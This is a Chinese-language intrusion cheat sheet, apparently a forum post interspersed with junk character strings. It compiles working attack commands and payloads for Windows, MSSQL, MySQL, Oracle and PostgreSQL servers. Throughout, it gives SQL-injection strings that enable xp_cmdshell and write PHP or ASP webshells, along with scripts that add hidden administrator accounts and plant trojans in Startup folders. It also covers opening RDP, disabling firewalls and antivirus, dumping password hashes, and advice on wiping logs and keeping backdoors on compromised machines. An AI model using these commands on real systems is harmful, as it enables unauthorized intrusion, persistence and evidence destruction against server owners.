渗透技术大全

admin

. m1 O+ O3 z$ o; \3 U4 x4 l3 I1.net user administrator /passwordreq:no
2 X; m; ]/ ^" x: ]# i9 I: [" u这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
4 t8 _6 _* H' P) T; J. j2.比较巧妙的建克隆号的步骤
6 H& V* ]+ E9 B- v先建一个user的用户
然后导出注册表。然后在计算机管理里删掉
% m3 K7 Y- F; f) {9 q在导入，在添加为管理员组
  p$ Y% ]- w9 t0 O3.查radmin密码
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
* r- u0 ~1 w0 `4 T# }: B: X  {4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
4 q- `' t" i' ^4 Y. n( y( `建立一个"services.exe"的项
再在其下面建立(字符串值)
( K0 {. v9 o2 _& f0 W4 t键值为mu ma的全路径
5.runas /user:guest cmd
测试用户权限！
' p7 z' F& h- v. @' R6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解，输入/?看看吧。（这个是需要管理员权限的哦）建立相同用户通过ntml验证就不必我说了吧？
7.入侵后漏洞修补、痕迹清理，后门置放：
$ `2 F8 x! t+ R2 D6 T6 X0 K6 z7 O基础漏洞必须修补，如SU提权，SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录；你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好，使用查询分析器会留下记录，位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之；IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录，如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个，标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴，如果这个机器只是台普通的肉鸡，放个TXT到管理员桌面吧~提醒他你入侵了，放置了某个后门，添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
. F. m4 l% y2 N3 X8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

% d: t. T1 [/ Ffor example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
! r1 @' s1 S9 R
  |+ C( _8 P+ ]1 j/ @( y3 q$ O* ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'

9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
$ a  {2 r! t. l) G- m4 ~7 S! _如果要启用的话就必须把他加到高级用户模式
可以直接在注入点那里直接注入
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
: h, l' z5 S8 x' W8 _' [& B+ B然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
$ C0 e" M: g4 ~9 k- ^2 A或者
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
来恢复cmdshell。
+ B5 a# _6 ?0 Z, p' t5 G6 z
8 K1 V" F/ w7 m3 Q  u/ k分析器
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
1 d# @9 O, @. x$ u10.xp_cmdshell新的恢复办法
2 E  r* z8 _) k, J/ Zxp_cmdshell新的恢复办法
扩展储存过程被删除以后可以有很简单的办法恢复：
2 o( [! b! m. t7 _" E; H; O删除
9 S2 D, m, \3 _" Edrop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

+ _+ V+ L9 q( @& P. ^0 w$ f恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复，不用去管sp_addextendedproc是不是存在

9 k* D& t* O( W  ?  J3 r-----------------------------
) O( @& i/ ?8 j2 O
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
9 R: \7 @- D2 p5 I' ]/ ^+ `; H8 t( [exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
' @! C. J0 \1 Q/ F- Z* t1 D2 O8 X/ ]

4 j; |  n1 O) q: Q/ G. u, |* g( w% h开启cmdshell的sql语句
; _" ^: Z- s$ L# j) j1 b
( E. P* q" Q1 Y, mexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
0 Y7 Q+ s- c2 H' I, s
判断存储扩展是否存在
; }* Y7 ^2 ?: S/ ?$ \! Zselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
9 n& m* |6 ^  W
恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok
1 v7 O0 D" h' M- m8 W! z9 H
3 @( {- i/ r* O( l0 X; s" x/ W* Z否则上传xplog7.0.dll
2 b4 ^! C  t" j8 e4 D$ bexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
0 B4 i4 P2 P  ]$ E" X9 E* ]
堵上cmdshell的sql语句
0 V7 K/ g  c" q. a4 ]sp_dropextendedproc "xp_cmdshel
0 W& {+ Q3 j( y; g  m-------------------------
+ w+ S! n+ S+ k清除3389的登录记录用一条系统自带的命令：
) S7 A9 o4 V) R, d: rreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
' N  q0 q& {9 Y, h
+ b% m4 D! Z, r1 }4 H  O5 s& {然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
在 mysql里查看当前用户的权限
show grants for  

  q8 x' d3 {" N4 S3 L+ n% [/ @以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql，只可以本地连，对外拒绝连接。以下方法可以帮助你解决这个问题了，下面的语句功能是，建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
2 U( J2 P% ]4 F: Z4 ^& d

" T. F# O3 c: Z5 h& b" FCreate USER 'itpro'@'%' IDENTIFIED BY '123';

5 P. x5 z2 A5 Z0 E) o7 ZGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
) Q  p9 r8 R/ k# C3 x$ ^0 m
" p. O3 ]  _) ?2 K3 H7 G4 sMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
( Y" |7 E9 m2 n* }
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

搞完事记得删除脚印哟。
. M1 y" d, A+ i9 @
! U" i2 }8 c' D8 S' eDrop USER 'itpro'@'%';

8 G2 S7 D$ ?; ~  n) h, IDrop DATABASE IF EXISTS `itpro` ;
* c5 I3 ]  L! t
当前用户获取system权限
5 B- Q9 X! B  H7 D, ^1 X+ \  Z& Bsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
2 d- u( T8 E" N! S程序代码
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  _: E; _2 h; U& E/ fos="WinNT://"&wsnetwork.ComputerName
, t" C# b0 I& i6 n; L2 MSet ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
) W/ C9 Q& q+ b1 R5 kod.SetPassword "123456abc!@#"
od.SetInfo
9 l9 @2 |! H0 `Set of=GetObject(os&"/nosec",user)
6 S. }& t9 |  e$ Y5 |& j5 ~) koe.add os&"/nosec"
$ J% B  i% L# w</Script>
" `) j' [( u! w$ _1 e9 [2 k$ Q7 G2 v<script language=javascript>window.close();</script>
: Z6 ?5 \2 o! B" I. u


$ w3 M/ ~  Z% c1 i  D" w* ~3 z
突破验证码限制入后台拿shell
# G: h5 |' Q$ F$ J程序代码
REGEDIT4
$ b4 }& T* D2 j! u4 w[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
/ s* X% h" f) L& E6 g"BlockXBM"=dword:00000000
2 J0 z: D: [7 g% m
0 i6 d0 m- _& U, e4 U9 o保存为code.reg，导入注册表，重器IE
: B4 e  z, Q6 D" Q. x) B就可以了
union写马
1 i! T' ?5 p- o; ], `程序代码
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

应用在dedecms注射漏洞上,无后台写马
+ e; i: |& V. ~. B6 Cdedecms后台，无文件管理器，没有outfile权限的时候
9 |5 B* h) H7 w6 E! d在插件管理-病毒扫描里
* _% @* c2 H( x. k4 M) H5 M5 p写一句话进include/config_hand.php里
: i/ z# O/ D' e. }/ _+ X2 J程序代码
>';?><?php @eval($_POST[cmd]);?>
' j( e4 N% D6 l* i0 J2 ^* s
( I& ?- X& L4 D5 {4 C
如上格式

oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
程序代码
$ ]  a- y6 N9 R( k" E/ ^select username,password from dba_users;
0 ?+ h, k+ P) k0 h

mysql远程连接用户
% b( ?$ R. Q3 U2 D1 |& g程序代码
) [. M' o) G3 Y* C
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
& S3 [: Y: j8 M
  b+ k% T) r% r% |( _+ t8 _) p$ K3 T' ~

+ C: g6 s& p, f* r
0 ~' H5 ]4 ]& u: x& v/ {1 S- mecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

9 @/ J9 J7 m5 Q( U% S1.查询终端端口

xp&2003：REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
6 ?! ~0 T1 M  p3 n3 h6 K
通用：regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
( G  I9 Q, W, S% r2 R
5 c% M" Z0 h, W+ ^4 P, }! f! ?+ C9 \2.开启XP&2003终端服务

# |. |" s( z# k+ D) U
" n; ?6 ]* L2 bREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
1 N0 G8 y8 N7 z

2 F- S) c/ \, X6 d. z; p2 dREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改终端端口为20008(0x4E28)
0 {' n" H7 N9 N7 o1 w4 O
- {- I! C8 ?7 F" U# g; c( iREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
6 w0 t1 w* H7 [
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
3 s0 {! e: G) d
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f


5.开启Win2000的终端，端口为3389(需重启)

: K& t- H1 Q7 C% m+ ?echo Windows Registry Editor Version 5.00 >2000.reg
1 ]0 t! s1 r; ~8 O) o$ W/ secho. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
9 R: Y' O- A& x4 @! A' Vecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
! O7 e2 E/ C2 p3 f7 wecho "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
2 ?/ q! v; `+ S( Z9 w& Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
: @3 |/ z: _6 R- Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
. p; B' g" h/ m/ l0 q/ j5 @" @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
, ~3 S! D2 w4 }8 Z0 ^echo "ortNumber"=dword:00000D3D >>2000.reg
+ n9 t  y) z/ Q/ U! _9 H' oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "ortNumber"=dword:00000D3D >>2000.reg
( n% z4 E- w. [9 O$ e1 h. z1 X
/ ?4 j6 B3 s/ ]6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
# h4 U- n7 v' d9 }
, p0 C/ C  D) d1 i; E0 F, t/ N@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
% @# M) ]. }  u1 P; L(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
; m4 |+ U; E) h& {rundll32 setupapi,%inf% 1 %temp%\restart.inf
2 s/ F/ P$ r. n1 n
2 }& A5 I* F$ Q* o: f9 x/ k' t+ X( _
7.禁用TCP/IP端口筛选 (需重启)

* k# N8 e. Q, o0 iREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.终端超出最大连接数时可用下面的命令来连接

# g$ |) |$ c) H4 ~( q+ bmstsc /v:ip:3389 /console
  @. m8 L; O6 o3 V0 }) L
9.调整NTFS分区权限

cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
8 C0 F% g% }0 E! Y! c, u' u
( c$ P! R: ?" ^cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)

------------------------------------------------------
7 `" g  V  H9 D) `; G! A7 x( E9 H3389.vbs
& K. A# l& j, u: `$ D# rOn Error Resume Next
  y4 t: P3 {+ o/ o  Zconst HKEY_LOCAL_MACHINE = &H80000002
1 y* I) C& B; W7 o9 L3 W. ^strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
, _6 z3 p" @, AstrComputer & "\root\default:StdRegProv")
; B6 C+ ^) a* b: ]: v* _1 CstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
* H% t9 \. Z2 J$ V- _3 S: Xoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
0 I8 |& O( A7 ^+ h( \  T! gstrValueName = "fDenyTSConnections"
- z  t" i7 j0 e* J3 tdwValue = 0
8 ?2 f2 O# r  moreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- _( L9 v& O) M4 p4 x! SstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
! f6 ]! v6 P' o+ r7 j) W; @strValueName = "ortNumber"
% A1 Z2 e3 [- f( F7 ?# @* W1 C5 tdwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. `# g8 S9 C1 J1 J4 H! t2 j, V, m) {strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
& Q- N* c. E; |) a1 |& \$ wstrValueName = "ortNumber"
( d' G, k+ I. g( u& }4 f5 e/ PdwValue = 3389
- Z5 B7 V* Q) k  voreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
, P5 i) u, ~9 @/ \3 I. PR.run("Shutdown.exe -f -r -t 0")
8 e2 u# X, m0 h$ Z  V
* c1 E6 d+ q* Q# {. `( X删除awgina.dll的注册表键值
程序代码
3 H& v8 P3 Y2 _; {1 O0 u' B
+ B9 p) B+ P! c3 ~, e+ ?0 n6 Vreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
6 ^; K3 @1 ?% O. m. `* y9 O
0 D6 b% q+ g4 A0 {6 A& [1 o+ V+ f
  C0 \2 s: J8 E+ t2 [' J9 S' }

$ T" r: L; Z3 j) Y, }5 ]5 l程序代码
0 {- l# P+ }+ |HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash

设置为1，关闭LM Hash

数据库安全:入侵Oracle数据库常用操作命令
0 H- {/ o4 [2 q0 W# s最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。
" K8 e6 s4 Y- Q6 A, H7 H1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
; o& K# \; s. x2 z7 \$ h& u- }3、SQL>connect / as sysdba ;（as sysoper）或
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
. o1 t* @; I9 K4、SQL>startup; 启动数据库实例
! K8 }; a. ]. W2 {9 u2 }5、查看当前的所有数据库: select * from v$database;
select name from v$database;
) U+ i& M# j0 W6 R  `& o$ l0 r6、desc v$databases; 查看数据库结构字段
/ X6 U$ |5 x5 v7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
" ~2 h8 A4 W: i: _! eSQL>select * from V_$PWFILE_USERS;
  y4 [# C- C* V* Q3 V: oShow user;查看当前数据库连接用户
8、进入test数据库：database test;
( R$ O; _7 Q. {, n9、查看所有的数据库实例：select * from v$instance；
' @( I& ~7 E& t* s. v  f8 m7 _) z如：ora9i
) Q' G! K4 o- ?* P( O; c& N. W" t10、查看当前库的所有数据表：
9 j/ s/ u' g# |' N* F5 GSQL> select TABLE_NAME from all_tables;
7 s3 B! y9 `; b2 k# ~/ p  ]0 K3 a; [1 Tselect * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
, L. r8 Y3 W- x( A6 a- T7 K( j/ lTABLE_NAME
------------------------------
$ \6 L$ {  C9 |1 K9 @5 I) B4 k_default_auditing_options_
11、查看表结构：desc all_tables;
12、显示CQI.T_BBS_XUSER的所有字段结构：
- T1 G! t6 n6 g* x1 mdesc CQI.T_BBS_XUSER;
2 L6 v2 N# L. |. E" l13、获得CQI.T_BBS_XUSER表中的记录：
& r- D" [- s5 f8 p( {% e6 xselect * from CQI.T_BBS_XUSER;
6 \* L* _! }: g5 T( }$ k8 {& O/ ^* y14、增加数据库用户：(test11/test)
1 |7 F- |3 y) d* I+ m. L, zcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
( z- R& `8 M% v5 f* N( g8 N/ W/ e+ K15、用户授权:
, n, N/ i1 @! u4 l( ?grant connect,resource,dba to test11;
grant sysdba to test11;
" E" {3 t8 K6 _$ y8 p, u4 _. bcommit;
16、更改数据库用户的密码：(将sys与system的密码改为test.)
' U4 f- w: O- u( E- m8 f' Yalter user sys indentified by test;
" u5 C2 d8 o" Balter user system indentified by test;
; u2 J! k' }7 c% P  a
( J5 @  |0 W* {4 a0 W/ z: C( sapplicationContext-util.xml
applicationContext.xml
struts-config.xml
, ?( e5 {6 b* [1 |( k3 }0 \- v& `web.xml
4 O, d* ]4 h# L: v* W0 @1 ]" G1 hserver.xml
# f8 v' M* E/ w/ Jtomcat-users.xml
hibernate.cfg.xml
, z1 c% ^8 U$ c2 |3 wdatabase_pool_config.xml
4 {% M7 x0 C2 S4 ^) T' g. j

% B  S# O% B9 k3 d# M( i\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
\WEB-INF\struts-config.xml  文件目录结构

spring.properties 里边包含hibernate.cfg.xml的名称

8 o8 u: k* a8 }: c+ I' ~: x- W
' @; e: V, B+ G8 w$ lC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
$ f7 v# \. B. S; u* w! v* j+ Q( v
如果都找不到  那就看看class文件吧。。

测试1：
( w; |) }& {3 z7 Q9 b$ OSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

' l, Z; f1 o- E6 A( \6 u测试2：

& {/ [+ S; r- Z4 W) ?! l9 f3 e3 ^create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- `3 E. ?" ~# |  B1 g
3 F9 v2 @* C0 tSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

( f6 Z7 X0 G1 e! Y4 [7 b查看虚拟机中的共享文件：
在虚拟机中的cmd中执行
0 I9 B, j+ }. x\\.host\Shared Folders
' z" j0 z% U4 U0 M
, q* Y) A- h8 k# ^1 Zcmdshell下找终端的技巧
) n$ f8 Q8 K5 Z* X5 i* E: X找终端：
第一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!
& X+ u  S1 `! O- |　　 而终端所对应的服务名为：TermService
第二步：用netstat -ano命令，列出所有端口对应的PID值!
( P* C& z; U) p+ {& v/ G　　 找到PID值所对应的端口
2 g- k1 D/ A. @" W- `
查询sql server 2005中的密码hash
2 ~6 G3 Q7 M+ rSELECT password_hash FROM sys.sql_logins where name='sa'
! G6 |' G0 q, N8 S0 K! K( `. VSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
1 @$ v5 G# V) ^! [! L7 K9 w/ U* K; Kaccess中导出shell
) |7 d" w/ ]* {/ Z, d- P; W
% \, U' S% ?$ r, w2 o中文版本操作系统中针对mysql添加用户完整代码：
2 b3 d* \$ q; ]
use test;
create table a (cmd text);
2 v' s* f* {2 M. ainsert into a values ("set wshshell=createobject (""wscript.shell"") " );
8 S) N# m7 @. T5 N5 uinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;
; y' U0 \3 F1 j/ F
英文版本：

, [6 z3 h# Z" x' W2 q" t# {2 b2 _use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
# Q" x4 @/ D5 E  F# j2 Q; yinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
$ y9 \# }+ w- p; u6 `4 c+ zselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
8 d: r/ j) b4 Hdrop table a;
: j+ R/ C9 F$ p( W5 w
3 ]2 i# z: }$ Mcreate table a (cmd BLOB);
: W2 V# g! n- [: r. Minsert into a values （CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
- W+ R! a8 p7 ydrop table a;
( b8 U4 ~& P( v7 `" \
5 W1 U/ S6 F2 [记录一下怎么处理变态诺顿
查看诺顿服务的路径
+ z# {6 i# B6 J; `" ]sc qc ccSetMgr
' U5 X8 ^5 d3 c9 ^8 Z: T% K然后设置权限拒绝访问。做绝一点。。
6 p8 k# b6 M+ G" w0 @cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
% Q5 b8 E0 |9 a) J: E3 Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
6 ?6 `; m2 O3 s9 z! f/ k8 hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
) K+ s# x6 u+ V- |+ Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
% x3 P$ H9 ~' o
  p3 G2 V0 W  C/ e然后再重启服务器
iisreset /reboot
  T+ W( |9 b3 ~2 e这样就搞定了。。不过完事后。记得恢复权限。。。。
( R+ z* ?0 c: r! ^) I9 Y2 jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
/ k: B' }$ ?% q5 m$ P8 W$ m% ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
- _  D: z# E; ?! [; OSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
2 ]. N$ m, A5 U0 n  D
! y" `( H. _! y' U/ ~EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

5 X" ?  t5 m0 v( ?* Gpostgresql注射的一些东西
如何获得webshell
4 f) V8 R& G) A6 Xhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
, A& `. o& X# O  E& W1 chttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
如何读文件
/ n0 b- ~5 W7 {0 X. Yhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
0 T% `- E) @" w# H8 R1 u& }7 \) |: Phttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
1 ^/ |/ i& w, w$ Mhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
* z/ m2 a6 W# f; N4 f8 L5 I8 T
6 K. x3 X0 Z' {: j" U6 A8 Yz执行命令有两种方式，一种是需要自定义的lic函数支持，一种是用pl/python支持的。
8 Q* j  g! F* G当然，这些的postgresql的数据库版本必须大于8.X
创建一个system的函数：
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
* T$ h$ }: |5 y, S3 a6 w. t
: ?, v+ j) W7 f( p创建一个输出表：
CREATE TABLE stdout(id serial, system_out text)

! ~( T/ X/ i! d+ A7 W- c! {- v执行shell，输出到输出表内：
3 A! R2 ]) x/ W4 c- u8 dSELECT system('uname -a > /tmp/test')
& T, R0 u# a; U, g2 W7 F; R! l
copy 输出的内容到表里面；
COPY stdout(system_out) FROM '/tmp/test'

从输出表内读取执行后的回显，判断是否执行成功
- g0 k: o6 b7 |2 V0 J' R
SELECT system_out FROM stdout
下面是测试例子
/ g$ x5 I8 ~9 S# A; U& L* J
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
9 P5 Y/ ?* X! O( U8 A  F
, L6 F) t7 B5 U( r% k& r/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
7 i- s: V6 n" J6 S( @STRICT --
# k7 G% O8 n' Y" b
$ u+ H! M7 D' V! C/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

: x& z4 v( ?& }1 m$ ]) ~' T4 F/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
) q& x7 y& E9 `# {  pnet stop sharedaccess    stop the default firewall
6 i& w& T6 [9 [* [: U8 g4 y/ Cnetsh firewall show      show/config default firewall
; s1 p( M/ c* C# u% Gnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
! s: m+ ?+ e1 D- H) t& f" y' rnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
